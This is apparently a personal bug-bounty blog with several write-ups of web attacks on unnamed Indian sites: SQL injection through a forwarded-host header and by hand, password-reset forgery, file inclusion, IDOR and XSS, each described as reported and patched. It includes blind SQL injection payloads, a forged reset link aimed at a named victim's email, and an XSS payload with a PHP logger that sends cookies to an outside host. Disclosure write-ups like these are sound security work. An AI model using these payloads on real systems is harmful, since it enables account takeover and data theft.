Friday 15 June 2018

#BugBounty —” Database hacked of India’s Popular Sports company”-Bypassing Host Header to SQL injection to dumping Database — An unusual case of SQL injection

Hi Guys,

One more interesting blog , one more interesting vulnerability that I managed to found out during my bugbounty hunt and it comes in India’s popular sports website and this is about “How I was able to exploit Host Header to find out SQL injection, bypassing rule using sqlmap tamper script and later on dump the database” . Let’s see what was the complete scenario —

While checking the application for bruteforce OTP vulnerability , I run the burp intruder on the site and found that my IP got blocked and I could see the error message thrown from which I could figure out that application was over AWS. Further I found that “X-Amz-Cf-Id” header set in HTTP response (which CloudFront adds to the viewer request before forwarding the request to the origin) -

Cloudfront header

and this was enough for me to decide that application is running over AWS. Now before directly jumping to check for some critical vulnerability, I always start from low hanging fruits (just to increase the list of vulnerabilities :) ) so I started with Host header attack , changed the host header value but it didn’t work. As I knew that application is over AWS so they must using ELB (elastic load balancer) so I tried the host header attack using X-Forwarded-Host header as below —
Added X-Forwarded-host header caption


Added X-Forwarded-Host header , set it to value to www.google.com and I got 302 redirection to google.com but when I set the value to www.evil.com , I got the below response-
HTTP 403 Forbidden


HTTP Forbidden with status code 403 and now something striked my mind. As it was clear that the application backend server must be having some whitelisting of host values (as it has allowed google.com but denied evil.com), now there are two possibilities either some script is checking it against array/list of allowed values or if they are storing the values in the database then there may be a Database lookup. So just to check the same , I tried some sql queries against the value of X-Forwarded-Host and this is what I got —


Time based SQL Injection in X-Forwarded-Host header

As you can see in the above screenshot, I gave a sql query with the sleep() of 10sec and time it took for HTTP response is 9.4sec. and yes , an unusual case of SQL injection in X-Forwarded-Host header :) and then the next task was to extract some DB content and as most usually I ran sqlmap over the vulnerable parameter and found that connection was getting refused , I decided to add the time delay to throttle HTTP requests and increase the connection timeout (--delay=DELAY --timeout=TIMEOUT and waited for some time but still I faced the same issue , might be some blacklisting of characters. To quickly check this , I entered “<script>alert(1)</script>” in the X-Forwarded-Host header and got the response with HTTP STATUS 400 — BAD REQUEST ERROR

The thing was pretty much clear, script tags, <,> character was blacklisted . SQLMAP provide tamper script — between.py to replace symbols (<,>) with “NOT BETWEEN”. So I included it in the sqlmap query , ran it and after some time I ended with the complete database of the enterprise containing sample level user credentials , email-ids and lots of more data — (For Proof of Concept)

Database Data


and this is how I was able to found an unusual case of SQL injection by bypassing Host header attack using X-Forwarded-Host in India’s Popular Sports company.

Report details-

03-May-2018 — Bug reported to the concerned company.

03-May-2018 — Bug was marked fixed.

03-May-2018 — Re-tested and confirmed the fix

05-May-2018- Rewarded by the company.

Thanks for reading!

~Logicbomb ( https://twitter.com/logicbomb_1 )

Sunday 23 October 2016

User Account Takeover via Reset Password Functionality

Hey Guys,

One more interesting blog explaining an interesting vulnerability that I have found recently in one of the Mobile Wallet Companies of India.

To login into any online website , we need to have an username which can be users registered mail id and password that he has set for it and if he doesn't remember his password, there is a Reset Password Feature which comes to help. While researching out for the vulnerability around this feature , I found a logical flaw by which I was able to reset any user password and login with the same to takeover his complete account. 

Let's now enter into the explanation-

1. When I clicked on Reset password functionality for the account "testaccount09@gmail.com", received a mail saying "To reset the password , please click on the below link-" and the link was something - 
 http://www._________.com/account/resetpassword/ id=296417 token=dGVzdGFjY291bnQwOUBnbWFpbC5jb20=&vit=MjAxNi8xMC8yNQ==  

2. Here 'id' is the identification number associated with the user account and 'token' is the base64 decoded registered mail ID of the user which here is "testaccount09@gmail.com" and 'vit' is the base64 decoded time stamp whose value in this case is "2016/10/25"
        

3. Researching more, I have found that the timestamp parameter is the expiry date of the reset password link which was here 2 days from the time user clicked on reset password.

4. Now comes the step of compromising user account. What I did is that I replaced the mail id of the user and encoded it to base64 in the reset password link and keep the timestamp value to 2 days ahead of the current date.

          Victim mail id - varun09811@gmail.com
          Base64 encoded value  (Parameter = token)                                                     - dmFydW4wOTgxMUBnbWFpbC5jb20=
          Timestamp value (Parameter = vit) - MjAxNi8xMC8yNQ= 
     

5. The tricky part comes here is to find "id" associated with that particular user mail id. Since it's a 6 digit code so I tried brute forcing it via a python script and after a while, I found the right id associated with the victim mail id which happens to be id=254346 .( yes, this is something time consuming ).

6.  So the tampered URL is - 
http://www._________.com/account/resetpassword/?id=254346&       token=dmFydW4wOTgxMUBnbWFpbC5jb20=&vit=MjAxNi8xMC8yNQ=











I loaded the link in the browser, set the new password for it! and I was successfully able to login into his account. I had the complete access to his account, can use his wallet money , change registered mobile number and everything!

I reported this vulnerability to the concerned enterprise, and they were quick to patch it within 2 days.I thank the company for the small token of appreciation :) 

That's all about it! 
Do share your feedback.

Thanks
~logicbomb

Tuesday 6 September 2016

Database Compromised via Manual SQL Injection

Hi Guys,

Recently while hunting for bug bounty, I was able to crack a website database using one of the most common vulnerabilities and yet the most severe - SQL Injection. I found this highly critical vulnerability in India's biggest "Online Job and test portal".

Let's have a quick review about SQL Injection-

Websites often use databases at the backend to store and manage large amounts of information. The de-facto standard language for querying databases is SQL. Web applications often take user input (taken out of the HTTP request) and incorporate it in an SQL query, which is then sent to the backend database. The query results are then processed by the application and sometimes displayed to the user.

By exploiting this vulnerability, an attacker can directly pass malicious queries and inputs to the database and interpret the responses from the database. It allows an attacker to read, write, modify or delete information stored within the database along with sometimes gaining system level access to the underlying operating system.

In the instances below, the affected parameters were passing user input directly to the back-end database without proper validation. Because of this, it is possible to insert malicious data into these fields to not only cause errors but also to gain complete access to the database. On successful exploitation of the vulnerability, an attacker would have access to Read, Write and Modify any data stored within the database.

Now lets jump into its POC-

I was able to detect the SQL injection in of the parameters via Blind SQL Payload.
vulnerable_parameter= ' and sleep(2) 

Note- sleep() - as the backend database was MySQL.

I found that as I change the value of sleep function, the same time the HTTP request takes to response means the page gets loaded after that particular time. In this case by keeping it 2 second , the response time of the HTTP request was 2 sec and when I changed it to sleep(10), the response it took was 10sec approx. This was the confirmation for me that SQL Injection exists and the parameter is vulnerable to Blind SQL Injection. Now the next step is to find all database related info along with database tables.
Now to find database username , I created the following payload-

(select%20*%20from(select(if(substring(user(),1,3)=%27pea%27,sleep(5),%27b%27)))a)---

This will check whether the third character of database username is 'a' on the basis of time taken for HTTP response as I used the same blind sql injection technique (sleep()). So by using this technique , I move one by one character to find the complete username.

Now to find table names, the payload used was-
substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1)=%27a*27,sleep(5),%27b%)))---

Similarly like above, it will check for each character in table name in the current database one by one (by changing the value) with the response time of 5 sec. Now once you get a name of a table, the next step is to find column name-

Suppose the table name we get is "users".

substring(select column_name from information_schema.columns where table_schema=database() and table_name='users' and column_name like '%u%' limit 0,1)=%27a*27,sleep(5),%27b%)))---

This will test whether the column name starts with 'u' for the table name "users" under the current database. If its true then page load after 5 sec.
and now comes the last thing to dump the table contents-

Here "column_name" will be replaced by the column that were fetched by above payloads.

(select 1 from dual where (select * from users where "column_name" like '%a%' limit 0,1)=%27a*27,sleep(5),%27b%)


Further this can be automated by a simple python script.

I reported this vulnerability and it was soon patched by the concerned enterprise in one week.
This is all about this hack! One of the most common and the most sever kind of vulnerability.

Do share your feedback and queries. 
Thanks.







Thursday 7 July 2016

Local File Inclusion Attack

Hi Guys,

Back with one more vulnerability technique "Local File Inclusion" attack. With this attack, I was able to get the complete source code of the application and the API keys of the victim enterprise.

I have found this vulnerability in India's largest online health platform website.

Let's have a look at the vulnerability-


A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files available on the web server or to execute malicious files on the web server. This vulnerability occurs when a user input contains the path to the file that has to be included. When such an input is not properly sanitized, the attacker may give some default file names and access unauthorized files, or an attacker may also make use of directory traversal characters and retrieve sensitive files available in other directories. Local File Inclusion (LFIs) allow an attacker to read and sometimes execute files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information. If the attacker is able to place code on the web server through other means, then they may be able to execute arbitrary commands.



By this vulnerability, I was able to read all the files including source code of the application and sensitive files like webconfig where I got APIs key of mail server, sms, payment gateway etc and further I was also able to use mail server key to send mail from enterprise mail server and were able to even send sms using the sms key.

The technique that was used to find this vulnerability is called Path Traversal Attack.




I found this vulnerability in the URL and the parameter shown in the screenshot above.

The response of the above URL HTTP request is as below-





By this I analysed that Micrsoft-IIS webserver is in use. So I tried to open WIN.INI file of windows by path traversal attack.


And I got the following response-





This is the content of WIN.INI file. So by this I was confirmed that Local File Inclusion vulnerability exist.


The “../” used in the example above represent a directory traversal. The number of “../” depend on the configuration and location of the target web server on the victim machine. Some experimentation may be required.

Now I tried escalating to this vulnerability.

And as expected I was able to get the complete source code for login.ashx page which is also a high vulnerability risk.

                             

Source code disclosure vulnerability allows an attacker to view / download the source code files of the web application from the webserver. These files can reveal sensitive information related to specific functionality of the website, how different web-pages react to various parameter values given to it etc. An attacker can use this information to carry out targeted attacks on the website which may lead to website compromise.
The files contain source-code files that are publicly accessible. An attacker may download these source-code files and carry out intellectual property theft.
In-addition, these files may contain sensitive details about the inner workings of the website and disclose additional vulnerabilities.




Response of above request-



Similarly , I was able to find the source code of complete application.

Now the critical aspect of this, below is the webconfig file –



Check the response-









As you can see , server credentials, mail server API key, sms service api key and payment gateway API key are accessbile.
By some more researching, I was able to use the keys to send mails, send sms etc.


Risk-

By source code disclosure vulnerability, I was able to get the complete source code of the application .
These files reveal sensitive information relates to the specific functionality of the application. For eg. I can get the logic behind the encryption used for login and hence can use it for user account hijack vulnerability.
The local file inclusion vulnerability gave me access to all the APIs key used in application. I was able to use mail server api key to send mails from the behalf of the company , and even sms. Payment gateway api can be used for completely bypassing the payment gateway and buying the product at much less price.


I reported this vulnerability to the concerned company on 19th June and it was soon patched after that.

Any feedback,suggestion would be highly appreciated :)

Thanks

~logicbomb

Thursday 16 June 2016

Customer Information Disclosure via IDOR

Hi Guys,
Recently while researching for bug bounty, I have found a very critical vulnerability of IDOR(explained in the last blog) in one of an Indian Shopping websites ( again can't disclose the name for some obvious reasons).

Some of the impact that I was manage to do by exploiting this vulnerability are-

  1. Full Customer Information Disclosure including complete name, Mail Id, phone number , Address.
  2. Delete address from any user account
  3. Add address details to any user account.

I found this vulnerability in one Shopping website of India.I had the access to all their customer data before the concerned company has patched it after I reported it to them.

Now lets see the steps-


1-  Like every shopping websites has, there is a functionality to choose delivery address where customer want to ship his product. When I clicked on my address where I wanted to ship the product and captured the HTTP request,  I found that there is an address_id tagged with my address.



The response of the above request contains my delivery address- Full Name, Mobile Number, Mail id, and address.









2-  As can bee seen in the above screenshot, this is my details. Now I tried changing the address_id to some other value like "1985170".



and checked the response.


3-  As there was no access control check, I was able to see other user address details. Now bruteforcing this 7 digit number, I was able to dump details of all the customer of the company.

4-  Similarly, there is a functionality to delete the address. Clicking on remove address functionality and capturing the request.



5-  Now, bruteforcing the address_id parameter , I was able to delete address of any user from his account.
Used the address id that I have got above.



and as expected, I got 200OK .




Now lets check whether the address has been deleted from his account or not.By using the same method by which I extracted his information.




and again as expected the address associated with that particular id is deleted.




6-  Similarly, I could add address to any customer account.
Clicked on edit address, and then save. The captured raw request is below-



7-  Now bruteforcing the address id and the details , I was able to add my address to any user account by just giving address id.

So this is all about this hack- A vulnerability directly affecting company reputation and customer trust.

I reported this vulnerability on 23rd May and it got patched soon after 1 week.


Suggestions, feedback, queries all are welcome :)
-logicbomb


Sunday 15 May 2016

User Account Hijack via IDOR

Hi All,

One more day of hack!

While researching for vulnerabilities, I have found a very critical vulnerability of Insecure Direct Object Reference(IDOR) in one of the Hotel Booking websites by which I was able to hijack any user account. 

What is IDOR?
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying value of a parameter used to directly point to an object. This is caused by the fact that the application takes input from the user and without performing any authorization check allow the user the access to the object.
This is occupying the fourth spot in Open Web Application Security Project(OWASP) Top 10 list of the most critical web application security risks since 2007.

I found this vulnerability in one Hotel Booking company of India. I was able to completely compromise any user account provided the mail id of the user.


Below are the steps- 

1. I created my account , and went to my profile section where I found different functionalities like  "Wallet Money" , "My bookings" just like every travel booking websites have.

2. Captured the request by clicking on "Wallet Money" functionality and found that there was a parameter containing mail id  i.e emailId.



The response to the request is the credit balance that the user has in his wallet.



3- Seeing this, I changed the mail id to some other mail id (obviously to one who has account in this website) and found that I was able to check wallet money of the user associated to that mail id.

I changed the mail id to victim mail address and I got the below response-



         







4- And similarly "My booking" functionality was vulnerable to IDOR where I could see the bookings made by the user by modifying the mail id . Then I went further, and tried to hijack user account using "New Password" functionality .

From the above two scenario, I found that there was no mapping of user mail id with any authentication token and there was no authorized check where the user has access to particular object or not.

5- I checked the "My Profile" section where I could change the current password ,captured the raw request.
            
   










6- Now as you can seen in the request, there are some parameter like FirstName,LastName, Email, Password, NewEmail.

Now I changed the "Email" parameter to victim mail id i,e moneyjain030193@gmail.com and kept the password of my choice i.e. 123456 and as I was expecting, I got 200 ok. 























and with no surprise I was able to log in successfully with the Victim id and with the password that I have chosen for him. 


That's all about this IDOR vulnerability ,simple yet critical.

Suggestions and feedback are welcome :)

Sunday 20 December 2015

User Account Hijack via XSS

Hi All,

This blog is about How I managed to hijack user account by exploiting XSS vulnerability in one of the biggest online food company of India. (Can't disclose the name for obvious reason)


Cross site scripting (XSS) is one of the most rampant and yet most underdetermined of web application vulnerabilities.Theft of cookies, personal data, authentication credentials and browser history are probably the less dangerous consequences of XSS attacks.Recently while working on web application vulnerabilities, I found XSS vulnerability in one most popular online food ordering website of India and when I paired it with some social engineering attacks, I was able to takeover user account .


So here are the steps-


1- First I discovered XSS vulnerability in the website.

Couldn't show the POC for it as it got patched.

The basic motive was to get user cookies, so for this, I did the following two steps-



  • Created a payload which could extract user cookies from the browser.
Payload- "><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie+">
  • Developed a php code to get the user cookies to my mail account.
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>


2- So the vulnerable link looked like


https://thevulnerablesite.com/asian?vulnerableparameter="><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie+">


The next step is to lure the user to click on it.


Note- User must be logged into the vulnerable website. Basically user cookies must be saved into user browser.

As user clicks on the malicious link sent to him by the attacker (as here I was the attacker) , I was able to get user cookies in my mailbox.


3- Open your browser (prefer mozilla firefox).Inject the captured cookies using any cookie editor like cookie manager into your browser.






Once you have done, reload the browser and here you are successfully logged in as victim user, having full access over his account.






By XSS attack, I have gained full access to victim user account, can make orders, cancel it, change the mobile number and perform payment too from his account.

I reported this vulnerability to the concerned organisation on 1st August 2015 and it got patched in December.

That's all folk about this vulnerability.
Thanks.
-logicbomb

Suggestions and Feedbacks are welcome. :)